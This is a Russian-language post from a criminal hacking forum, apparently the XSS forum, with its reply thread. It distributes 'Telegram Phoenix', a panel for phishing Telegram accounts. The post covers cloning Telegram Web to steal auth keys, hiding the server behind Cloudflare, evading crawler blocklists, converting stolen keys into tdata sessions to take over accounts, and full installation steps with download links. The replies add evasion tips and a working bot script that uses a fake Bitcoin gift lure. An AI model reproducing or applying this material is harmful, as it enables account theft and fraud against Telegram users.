• XSS.stack #1 – первый литературный журнал от юзеров форума

фишинг Telegram Phoenix | Панель для фишинга телеграм аккаунтов

Interpoll

HDD-drive
Пользователь
Реакции
72
Гарант сделки
1
Автор: Interpol
Источник: XSS
Скрипт: Telegram Phoenix

В этой статье я поделюсь с вами Telegram Phishing панелью который я монетизировал до этого момента и в каком-то смысле убиваю его для себя как источник заработка и приватный скрипт как и для единиц конкурентов со своими панелями которые неплохо на этом зарабатывают. Конечно я буду очень рад призовому месту в конкурсе, но в любом случае надеюсь только на позитивный Feedback с вашей стороны, спасибо!

Для работы фишинга я клонирую web-клиент Telegram чтобы полностью имитировать авторизацию мессенджера и в конечном авторизации похитить необходимые ключи ( auth key ) авторизации из localstorage. Так же клонирование официального репозитория позволяет нам при авторизации высвечивать реальный IP и устройство жертвы, что прибавляет плюс к доверии. Чтобы вы знали, ранее мы создавали приложение чтобы создать сессию с использованием наших APP_ID / HASH_ID и при авторизации показывались данные нашего приложения и IP сервера, это было неэффективно поскольку Telegram начал сильно бороться с фишингом и очень усложнил его работу, аккаунты банились и сессии отключались автоматически следуя по новым алгоритмам защиты от мессенджера.

Вам будет необходимо иметь как минимум 2 домена, первый для отправки данных клиенту и второй для отображения вашей собственной фишинг-страницы. В моей панели можно развернуть целую команду или запустить собственную продажу подписок на панель, у каждого пользователя будет свой небольшой личный кабинет в боте Telegram в котором у него будут доступны все необходимые функции для работы с фишингом, естественно у каждого должен быть свой домен.
user.png

admin.png
Это Web-интерфейс но так же есть возможность использовать WebApp в боте, таким образом ваш домен не будет виден пользователю. Делается это несколькими строчками кода и ничего больше, если будет необходимость прикреплю небольшой скрипт.
web.png

Процесс работы с доменами происходит так: Владелец панели создает аккаунт на Cloudflare и уже с помощью проксирования на свой сервер добавляет домены, таким образом мы сразу можем включить SSL-защиту и так же немного спрячем реальный IP-адрес нашего сервера, для каждого нового пользователя в нашей панели мы добавляем таким образом домен и далее пользователь может добавить его в своем личном кабинете, он будет проксировать на наш сервер и передавать логи идентифицируя пользователя по его домену.
cloudflare_1.png

cloudflare_2.png

Далее следуем инструкциям от Cloudflare и направляем наш домен к указанным NS-серверам.
На последнем этапе вы сможете включить SSL-защиту.

После этой манипуляции пользователь может добавить домен в своем личном кабинете и он будет проксировать.

Относительно важный момент насчет доменов, добавлена необходимость установки ключа чтобы веб-краулеры не зафиксировали сразу наш фейковый домен и не заблокировал домен, иначе почти моментально можно получить красную табличку небезопасности сайта. Чтобы избежать такого момента мы просто устанавливаем в личном кабинете ключ с любым словом, у меня он будет к примеру "connect", наш сайт будет доступен по адресу: https://domain.com/connect
После того как добавите домен прожмите еще раз /start в боте чтобы появилась возможность добавить ключ. ( Конечно вы можете поставить клоаку если желаете, но это на ваше усмотрение )

key.png

Моя панель имеет множество полезного функционала для работы с похищенными аккаунтами. В частности поговорим про конвертацию, изначально мы получаем ключи авторизации но мы можем конвертировать их в сессию Telethon которая может быть использована в различных софтах для автоматизации, а так же возможность конвертировать в тип tdata - который позволяет нам войти в аккаунт.

tdata-convert.png

Как войти в аккаунт? Очень просто, для начала конвертируем наш полученный ключ в формат tdata.
Для входа нам понадобится портативная версия Telegram Desktop, если отсутствует скачиваем его из официального сайта.
После разорхивации у вас появится папка с содержанием: modules и telegram.exe , после первичного открытия приложения должна появится папка tdata в той же директории. Все что нам нужно это просто скопировать наши файлы в папку tdata, после этого снова открываем Telegram и мы в аккаунте!

Шаблоны: Небольшая оболочка перед авторизацией, в архиве уже имеются несколько шаблонов которые доступны для использования, но вы так же можете их подкорректировать под себя изменив html-разметку.

Дамп: Позволяет нам экспортировать медиа-данные пользователя, такие как фото и видео материалы, если у вас имеются минимальные знания в python - вы сможете отредактировать метод дампа в коде.
Мы так же можем выгрузить свои логи за определенный период времени.
Статистика говорит сама за себя, в этом разделе мы можем увидеть активность пользователей и их количество логов.

Если вы решите разобрать код сможете заметить функции или логику которая не используется, это нормально. В ходе обновлений некоторые функции были урезаны, обновлены, изменены и так далее, к примеру авто-SSL, спам бот и всякого рода неиспользуемого кода. Если вы решите внести свои корректировки у вас в распоряжении много примеров.

Перейдем к установке скрипта на сервер Ubuntu , в качестве web-сервера я выбрал NGINX, перед установкой у нас должны быть готовы 2 домены в Cloudflare и соответственно сервер на базе Ubuntu
FTP Инструменты которые я могу посоветовать: WinSCP + PuTTY

1. Подключаемся к серверу с помощью SSH и в консоли сразу устанавливаем зависимости, нам понадобится node для работы клиента и python для бота:

Устанавливаем nginx, не забываем перед этим обновить apt (sudo apt update):
- sudo apt install nginx
Настройка UFW (Firewall):
Убедимся в том, что UFW установлен командой ufw. Если его нет, то установим:
- sudo apt install ufw

Разрешаем порты 80, 443, 22/21 для работы nginx, ssh:
- ufw allow "Nginx Full"
- ufw allow "OpenSSH"

После разрешения портов, можем включить UFW:
- ufw enable

Устанавливаем node.js от 18 версии:
- curl -fsSL https://deb.nodesource.com/setup_18.x | sudo -E bash -
- sudo apt-get install nodejs

Устанавливаем Python 3.10:
- sudo apt install python3.10
- sudo apt install python3-pip
- sudo apt install python3-venv

Дополнительный зависимости:
- sudo apt install build-essential zlib1g-dev libncurses5-dev libgdbm-dev libnss3-dev libssl-dev libreadline-dev libffi-dev libsqlite3-dev wget libbz2-dev

Теперь можем загрузить файлы на сервер.
Бота на python можем загрузить в основную директорию /root/,
в /root/main.py и /root/bot/.env ставим токен от основного бота который будет использоваться как панель и ID аккаунта который используется как админ, остальное необязательно.

TWeb перемещаем в категорию nginx: /var/www/
Сразу ставим свой домен для проксирования данных в /var/www/tweb/src/index.ts на 85 линии.
( P.S Если при билде файл не поменялся и остался закэшированный - поменяйте домен в index-...js из папки public и dist. Не обновленный домен вы сможете заметить в код элемента - src - index или если при авторизации на сайте зависнет все после последнего этапа. )

2. Telegram Web уже есть в архиве, его страница на github: https://github.com/morethanwords/tweb.git

Устанавливаем его зависимости в директории tweb командой:
- npm install -g pnpm
- pnpm install
В консоли появится ошибка forEach, это баг модуля и для его устранения в архиве есть файл который нужно расположить в /var/www/tweb/node_modules/vite/dist/node/chunks

Делаем билд командой: npm run build ( заранее установите зависимость pnpm , вас об этом попросят )
Так же к вашему вниманию при каждом запуске скрипта делается билд, к слову.

3. Устанавливаем бота для отстука:
Устанавливаем зависимости в /bot: pip install -r requirements.txt
- pip install fastapi telebot aiohttp_socks
- pip install "uvicorn[standard]"

4. Создаем службы для фоновой работы скрипта:
1) Обязательно создать папку logs в root для логирования запущенных сервисов
2) В архиве будет три сервиса bot.service , tweb.service , main.service
1) Необходимо закинуть все сервисы в директорию /etc/systemd/system
Служба - это конфигурационный файл который запустит наши скрипты, он будет поддерживать постоянную фоновую работу.
5. Настройка nginx:
1) В архиве (conf.d) будет конфигурационные файлы nginx.
2) В директорию /etc/nginx/conf.d перемещаем два файла: tweb.conf и work.conf
3) в server_name вводите ваш домен, два разных домена в два файла ( домена должны быть направлены на ваш сервер через A-запись по IP, используйте cloudflare )

домен в work.conf и в index.js из tweb должны совпадать, потому что он служит для проксирования данных

5) Перезагружаем nginx чтобы обновления вступили в силу:
- systemctl reload nginx
6. Запуск:
1) Обновим все службы командой:
- systemctl daemon-reload

2) Теперь включаем все службы:
- systemctl enable bot.service
- systemctl enable tweb.service
- systemctl enable main.service

3) В завершении запустим все службы:
- systemctl start [Название, пр: bot.service] - Используйте для запуска
- systemctl restart [Название] - Для перезапуска
- systemctl status [Название] - Для просмотра статус
- systemctl stop [Название] - Для остановки

4) Ждем ~1.5 минуты: это время требуетя на создание билда Telegram Web.
Если никаких ошибок не возникло и страницы работают - значит все сделано правильно.

Проект: https://krakenfiles.com/view/5UYWYSJ1i4/file.html
или - https://pixeldrain.com/u/cPBCJDfW
Пароль от архива: xss.pro

Последнее редактирование модератором:
То есть, ты просто пишешь текст, без какой-либо редакции, и, внезапно, собираешься опубликовать тему, проверяешь его на грамматические ошибки, ставишь запятые, удостоверяешься, что все в порядке, и случайно опубликовываешь его?

То есть, ты просто пишешь текст, без какой-либо редакции, и, внезапно, собираешься опубликовать тему, проверяешь его на грамматические ошибки, ставишь запятые, удостоверяешься, что все в порядке, и случайно опубликовываешь его?
нет, я в процессе случайно опубликовал тему и после отредактировал его на информацию которую ты прочитал.

Последнее редактирование:
Нет чтобы поддержать, сразу с нападками на человека.
Любом случае, думаю выборка будет не по критерию, в какой строке твоя тема...
---
Автору - Надеюсь что-то интересное будет, заинтриговала тема.🤙

Знакомые лица 🫠
Ты ж вроде селил лайфтайм за 500$, а тут исходники за free выложил.
Не оценили товар как источник заработка?
Тема интересная, бабки хорошие приносит, автору Призовое место 🫰

Знакомые лица 🫠
Ты ж вроде селил лайфтайм за 500$, а тут исходники за free выложил.
Не оценили товар как источник заработка?
Тема интересная, бабки хорошие приносит, автору Призовое место 🫰
Источник заработка очень хороший, если даже условно создать свою команду и бесплатно раздать доступ а взамен получать только логи в качестве комиссии - это очень хорошая тема в настоящее время.
Проект мне действительно дорог, но заниматься им у меня совсем не хватает времени в жизни. Вот и решился поделиться с вами и поучаствовать в конкурсе.

Пожалуйста, обратите внимание, что пользователь заблокирован
Ну что хочу сказать, панель прекрасна. Поначалу были проблемы с установкой, но тс помог и всё настроил за пару монет.
Насчет работы, отстук космический, 9 фишингов, ну разве это не сказка ? Платежная система, можно работать в команде, добавить разные домены прямо из бота в тг и много чего ещё...
Видно с какой любовью был написан проект и как тяжело было его сливать. Желаю победы в конкурсе, определенно заслуживает первого места!

человек реальный, если будет необходимо я думаю он сможет доказать серьезность слов перепиской из телеги под хайд команде форума
Ну так уж не пались...
Панель скачал, руки пока не дотянулись протестировать,

Желаю победы в конкурсе, определенно заслуживает первого места!
Боюсь фиш телеграмм не совсем для этого подходит, уж извините, тема перелопачена 10 раз в паблике.

Боюсь фиш телеграмм не совсем для этого подходит, уж извините, тема перелопачена 10 раз в паблике.
Уверяю, все что можно найти в паблике это нерабочие и старые скрипты которые неактуальны или вовсе не встают.
В моем софте присутствует самый продвинутый метод авторизации и конвертация которая не пересоздает сессии ломая тем самым основу, так же масса других предвиденных аспектов.

Немаловажная особенность это запуск своей команды для массового фишинга или продажа подписок там где это тема не совсем популярна.
Конкурирующие панели в которых ровно такой же функционал как и в этом до сих пор продают и у них покупают месячную подписку на подобный софт.

Но в любом случае твое мнение я принял! Спасибо.

Уверяю, все что можно найти в паблике это нерабочие и старые скрипты которые неактуальны или вовсе не встают.
В моем софте присутствует самый продвинутый метод авторизации и конвертация которая не пересоздает сессии ломая тем самым основу, так же масса других предвиденных аспектов.

Немаловажная особенность это запуск своей команды для массового фишинга или продажа подписок там где это тема не совсем популярна.
Конкурирующие панели в которых ровно такой же функционал как и в этом до сих пор продают и у них покупают месячную подписку на подобный софт.

Но в любом случае твое мнение я принял! Спасибо.
Нисколько не хочу обидеть тебя, бро, это мое такое знаешь ебаное мнение, которое ничего не значит, просто я посчитал что фиш не то, а может кто-нибудь думает иначе.

Но если все так круто как ты рассказал — то конечно респект.

Фиш написан неплохо.
Кодер помог с установкой.
Работают все на ура и очень четко.
Очень хорошо работает, есть минус с вылетом сессий, но мне кажется, что сложно сейчас с этим моментом.
Огромный плюс, что бесплатное, хотя +- такой же скрипт, один клоун на зеленке продает за 300 долларов.

Фиш написан неплохо.
Кодер помог с установкой.
Работают все на ура и очень четко.
Очень хорошо работает, есть минус с вылетом сессий, но мне кажется, что сложно сейчас с этим моментом.
Огромный плюс, что бесплатное, хотя +- такой же скрипт, один клоун на зеленке продает за 300 долларов.
у тебя отрицательный рекорд по реакциям )))

По фишингу, когда раньше пользовался взломал точечными атаками где то человек 10-20, но везде были разлоги, даже у жертвы.
Автор такой вопрос, как лучше пользоваться твоим фишом ? на что лучше обращать внимание чтобы уменьшить количество разлогов, блокировок и тд ?

Если поднять панель из РФ, есть шанс набутылится?
Если работать по РУ, то да, я тебе её уже принес 🍾)
А если работать по пендосам, то грамоту от трех веселых букв могут даже дать, и можешь спокойно дышать.

у тебя отрицательный рекорд по реакциям )))

По фишингу, когда раньше пользовался взломал точечными атаками где то человек 10-20, но везде были разлоги, даже у жертвы.
Автор такой вопрос, как лучше пользоваться твоим фишом ? на что лучше обращать внимание чтобы уменьшить количество разлогов, блокировок и тд ?
причина разлога всегда разнообразная, не бывает определенной проблемы которую можно решить и закрыть этот вопрос надолго.

самая основная причина это новый апдейт от Telegram который по кнопке позволяет закрыть новую сессию в аккаунте, большинство просто не обращают внимания на это так как видят там свое устройство и свой IP ( в случае с моим софтом ) , но часть которая разбирается могут заподозрить что-то и закрыть или просто нажать "по приколу" - это доступно в новых версиях обновленного приложения.

дальше банальная подозрительная активность на аккаунте и автоматические действия Telegram по завершению новых или всех сессий на аккаунте, важно так же учитывать правильный вход в аккаунт через TDATA, в некоторых случаях сессия может сломаться при входе, имеется в виду не заносить с собой мусор перед входом.

так же стоит учесть блек доменов которые содержат частичное или полное сходство с официальным названием социальных сетей, такие домены чаще проверяются так называемыми краулерами и блокируются очень быстро (КТ - красная табличка небезопасности сайта), в выборе домена стоит обратить на это внимание.

Чтобы внедрить сайт внутри бота и открывать его WebApp приложением предоставляю следующий скрипт который нужно запустить на сервере:

photo_1.jpgphoto_2.jpg

Создаете специального бота под скрипт, оформляете красиво.
TOKEN = Токен от вашего нового бота
LINK = Ссылка на ваш фишинговый сайт
MSG = Ваше любое приветственное сообщение при старте
gif_url = Ссылка на gif-анимацию которую вы хотите использовать

Python:
import json
from aiogram.types import ReplyKeyboardMarkup, KeyboardButton, WebAppInfo, InlineKeyboardButton, InlineKeyboardMarkup, \
    Message, InputFile
from aiogram.utils.callback_data import CallbackData
from aiogram import Bot, Dispatcher, executor, types

TOKEN = 'YOUR_NEW_BOT_TOKEN'
link = 'https://YOUR-DOMAIN.com/connect'
MSG = f'''
By continuing to use BTC GIFT you agree to the [terms of service](https://LINK.com/user-agreement) and [privacy policy](https://LINK.com/privacy-policy)

⏳ Gift Code activation for 0.05213433 BTC..

To activate code in the amount of 0.05213433 BTC:

You need to confirm that the Telegram account belongs to you!

'''

API_TOKEN = TOKEN

bot = Bot(token=API_TOKEN)
dp = Dispatcher(bot)

keyboard = ReplyKeyboardMarkup(
    keyboard=[
        [KeyboardButton(text="Activate", web_app=WebAppInfo(url=link))]
    ],
    resize_keyboard=True
)

# link to gif
gif_url = 'https://xss.pro/' 

@dp.message_handler(commands="start")
async def start(message: types.Message):
    await bot.send_animation(message.chat.id, gif_url, caption=MSG, reply_markup=keyboard, parse_mode=types.ParseMode.MARKDOWN)

if __name__ == '__main__':
    executor.start_polling(dp, skip_updates=True)

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх